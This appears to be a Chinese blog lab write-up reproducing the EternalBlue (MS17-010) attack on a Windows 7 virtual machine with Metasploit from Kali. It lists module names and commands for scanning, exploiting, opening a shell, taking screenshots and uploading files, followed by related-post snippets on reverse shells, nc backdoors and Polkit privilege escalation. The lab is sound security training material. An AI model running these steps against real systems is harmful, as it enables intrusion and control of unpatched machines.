模拟“永恒之蓝”攻击,实现系统提权

已于 2023-08-28 10:01:04 修改
阅读量1.6k 收藏 6
点赞数 2
分类专栏: 网安实验 文章标签: 安全 java linux
于 2022-10-06 19:44:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61861243/article/details/127186447
版权

实验目的:

使用Kali Linux平台的“metasploit framework”工具,针对Windows7操作系统模拟“永恒之蓝”攻击,实现系统提权。

实验环境:

系统: kali  Windows7

kali用户名:kali                                密码:kali

Windows7用户名:小王                   密码:123456

实验步骤:

1.检测靶机的445端口。

 2.在kali中观测靶机的开放端口及版本

3.启动“metasploit framework”平台

 

 4.执行“search ms17-010”命令,查看可以利用的攻击模块

 5.使用“use auxiliary/scanner/smb/smb_ms17_010”加载扫描模块

 6.执行”show options”查看配置选项

 7.再次执行“search ms17-010”命令查询可利用模块

 8.执行加载“use exploit/windows/smb/ms17_010_eternalblue”模块

 9.执行“set rhost 192.168.98.130”命令,设置远程目标主机地址。

 10.执行“exploit”命令攻击

11.执行shell切换到靶机下 

 12.发现乱码执行chcp 65001将乱码转化

 13.执行exit推出靶机执行screenshot捕捉靶机屏幕并查看图片

 

 14.在kali下新建一个文档txt 传输到靶机下

 

 15.文件成功传输到靶机下

Krismile☜
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
Linux Polkit本地提权
02-07
描述:Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进 程进行通信的有组织的方式。CVE-2021-4034,polkit 的...利用:上传exp,给权限执行cve-2021-4034-poc提权获得root权限
模拟WananCry病毒攻击流程
vivlol918的博客
05-25 371
用于攻击Windows操作系统中的漏洞。但由于该工具在网络上意外泄露,黑客们也开始利用这个漏洞来入侵计算机系统
渗透靶机网站之使用绝对路径终端命令绕过检测获取最高权限练习1
yuan_boss的博客
06-19 305
​ 但是,一般情况下服务器的密码不会是弱口令,所以如果没有强大的密码字典,是几乎没办法爆破出来了,纯靠运气,而且强大的密码字典太大了,可能爆破几天几夜也爆破不出来,所以这个密码爆破方案只能先这样放着,起个终端让他慢慢爆破,我们得开始考虑从其他地方入手了。命令查看内容,没有什么重要的信息,经过再三思考,我发现,我们通过反弹shell进入终端的目录就是当前网站所在目录,一般肯定是没有什么系统用户相关的信息的,这些信息一般放在。用户的终端之后,开始查找目录,看看能不能找到有用的东西,找来找去,发现。
利用永恒之蓝漏洞渗透win2008并提取主机权限
最新发布
weixin_65633498的博客
04-10 377
一、漏洞介绍漏洞名称:永恒之蓝漏洞编号:MS17-010漏洞产生的服务:smb----445影响的版本:全系列windows系统漏洞库介绍:MS微软漏洞库,17--2017年,010--第10个漏洞;二、查看漏洞工具:nmap漏洞特征:1.135139445端口开放nmap -sS受害机IP-p端口范围扫描操作系统,如果版本较低,则漏洞存在nmap -O受害机IP三、漏洞利用1、打开metsploit。
MS17-010(永恒之蓝)漏洞分析与复现并通过NC提权
weixin_49905950的博客
06-05 484
讲解如何利用永恒之蓝攻击 win2008 靶机并植入nc木马,让win7在开机启动注册表中添加内容,实现nc.exe开机自启。并在kali里面进行连接,验证上述操作是否成功。
445端口攻击
热门推荐
m0_61948493的博客
11-23 1万+
一、简单的渗透攻击 1、端口 首先要先了解了解一下一些基本的端口所对应的服务: 1)FTP:文件共享服务 2)SSH:专为远程登陆会话和其他网络服务提供安全性的协议,有效防止远程管理过程中的信息泄露问题(比telnet安全) 3)telnet: Internet远程登录服务的标准协议和主要方式 4)SMTP: 建立在FTP文件传输服务上的一种邮件服务 5)DNS : 域名解析服务 6)HTTP 、HTTPS:超文本传输协议(建立在TCP,HTTPS比HTTP更安全) 7)共享...
后渗透之永恒之蓝提权远程连接
dl1286670932的博客
11-19 1405
永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
渗透基础笔记+作业(永恒之蓝复现)
09-08
渗透测试是一种重要的网络安全评估方法,旨在模拟黑客攻击行为,揭示潜在的安全漏洞,以增强系统防护能力。这个过程涉及多个步骤,从前期交互开始,到后期的渗透攻击和报告撰写。 前期交互是渗透测试的起点,测试...
操作系统-模拟磁盘文件系统实现
03-20
操作系统课程设计——模拟磁盘文件系统实现,可视化界面,文件存储; ①代码文件; ②课设报告; ③主干代码;
操作系统模拟实现 C++编写
04-14
本资源用c++模拟操作系统实现 主要内容:1.进程控制 2.分页式存储管理 3.设备管理4.文件管理 5.进程调度 有问题 联系 lx15636825085@163.com
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 6504
ms17-010漏洞利用(本地环境复现)
kali入侵win7(转载)
m0_56071898的博客
05-04 5657
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 6348
超详细永恒之蓝复现教程
渗透测试概念以及永恒之蓝渗透测试模拟
dream2662583的博客
10-17 84
渗透攻击的概念以及主机漏洞利用演示(此处利用的是永恒之蓝漏洞)
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2751
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
在kali 里寻找widows的ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限
net的博客
01-10 875
永恒之蓝漏洞攻击一、实验环境Windows7机器作为靶机(192.168.180.134)存在永恒之蓝的漏洞kali linux2022机器作为攻击机(192.168.180.130)验证条件:攻击机ping靶机,ping成功才可进行下一步。(ctrl+z,才会停止)若没有ping成功,可能是靶机防火墙没关的问题,关闭就行。二、实验步骤首先,输入“msfconsole”进入metasploit(MSF)工具控制台,(界面随机)1、先去在msf中找一下msf的脚本。
利用漏洞永恒之蓝ms17-010对win7目标进行渗透
ABABC1234的博客
07-06 1077
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者不要利用技术做违法的事情,不然真的会很刑!!!
kali 利用msf通过win7永恒之蓝漏洞获取权限
Snakewood的博客
10-06 7639
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索
模拟远程代码执行攻击永恒之蓝,具体过程
03-31
1. 扫描目标 攻击者首先需要扫描目标网络,以确定可能存在漏洞的系统。在永恒之蓝攻击中,攻击者使用了Nmap等工具来扫描目标网络,以确定是否存在运行旧版Windows操作系统且未应用补丁的系统。 2. 利用漏洞 一旦找到了漏洞,攻击者就可以使用Metasploit等工具,利用漏洞获取目标系统的访问权限。在永恒之蓝攻击中,攻击者利用了Windows操作系统的SMB漏洞,通过发送恶意SMB数据包来获取目标系统的访问权限。 3. 安装后门 攻击者在获得目标系统的访问权限后,会安装一个后门程序,以便在未来能够随时访问目标系统。在永恒之蓝攻击中,攻击者利用了DoublePulsar后门程序,该程序可以在目标系统上执行任意命令。 4. 执行恶意代码 一旦安装了后门程序,攻击者就可以在目标系统上执行恶意代码。在永恒之蓝攻击中,攻击者使用了EternalBlue漏洞,该漏洞允许攻击者在目标系统上执行任意代码,包括拥有管理员权限。 5. 控制目标系统 最后,攻击者通过控制目标系统,可以窃取敏感数据、加密文件、勒索钱财等。在永恒之蓝攻击中,攻击者利用了目标系统的管理员权限,可以执行任意命令,包括安装其他恶意软件、修改文件等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值